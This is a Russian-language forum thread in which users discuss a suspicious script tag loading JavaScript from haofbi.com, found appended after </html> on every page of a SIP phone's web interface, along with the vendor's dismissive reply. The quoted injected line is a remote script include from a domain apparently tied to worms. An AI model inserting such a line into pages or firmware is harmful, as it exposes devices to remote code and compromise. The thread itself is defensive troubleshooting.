Подозрительный код в SIP телефоне

[^D^ima]

Стал ругаться гугл на открытие внутреннего IP телефона.

Смотрю код страницы, вижу:

</body>
</html>
 
<script language=javascript src=http://www.haofbi.com/js/w.js></script>

Именно на этот сайт и ругается гугл. Такая вставка на каждой странице самой последней строчкой!!! Во всех телефонах этой модели.

Поиск по гуглу ничего вразумительно го не дал, кроме как похожие посты с вопросами о том, что это такое.

Вот ответ суппорта:

Цитата

Добрый!

Не переживайте, вируса в ПО никакого нет!
Сайта такого на сегодня вообще не существует:
Vladimirs-Mac-mini:~ vladimirgurin$ ping www.haofbi.com
ping: cannot resolve www.haofbi.com: Unknown host

Ранее он был необходим разработчикам ПО телефона.

Этот код после </html> вообще исполняется? Или там мертвым грузом лежит? И вообще как-то странно это все...

[Akina]

haofbi.com - домен, принадлежавший китайскому хостеру Xin Net. В прошлом году бегали пара червяков, славших туда что-то... подробностей не знаю (краем уха слышал, что оттуда через заражённые IP-телефонные станции качались "левые" звонки, что при хреновой настройке вставало владельцам в изрядную копеечку). На текущий момент аренда имени не продлена, DNS-ы про домен не знают.

Но откуда-то оно у тебя берётся...

[^D^ima]

Меня смутило что "Ранее он был необходим разработчикам ПО телефона." Браузерным анализатором видно, что есть GET запросы туда, так что что явно не то.

[Akina]

Цитата ^D^ima @ 26.09.17, 10:03

Меня смутило что "Ранее он был необходим разработчикам ПО телефона."

Да я бы вообще вздрючился по этой фразе. Во радости, когда твоё оборудование что-то куда-то, а ты не ухом ни рылом...

[Pavia]

^D^ima

Цитата ^D^ima @ 26.09.17, 10:03

Меня смутило что "Ранее он был необходим разработчикам ПО телефона."

1) Не обращай внимание на название. Оно не всегда отражает суть проблемы. Даже я бы сказал так оно всегда не отображает суть проблемы.
ИБ-уязвимостей слишком много и человек там как правило почти ничего не поверяет а используются программы-роботы. И что она там и как классифицировала никто не знает.
2)
Может левые звонки делали, но скорее всего просто свою рекламу показывали у них это модно и не запрещено.

Цитата Akina @ 26.09.17, 10:51

когда твоё оборудование что-то куда-то, а ты не ухом ни рылом...

А инструкцию и договор никто не читает... А там наверно мелким шрифтом и непонятными словами.

[^D^ima]

Цитата Pavia @ 26.09.17, 15:30

А инструкцию и договор

Договор на что? и инструкция на 4 страницы

[^D^ima]

Собственно тот-же телефон:
Прикреплённый файлphone.jpg (98,88 Кбайт, скачиваний: 75)

[^D^ima]

Ещё и ддосит походу:
Прикреплённый файлphone2.png (133,8 Кбайт, скачиваний: 78)

[^D^ima]

Прикреплённый файлphone3.png (56,09 Кбайт, скачиваний: 73)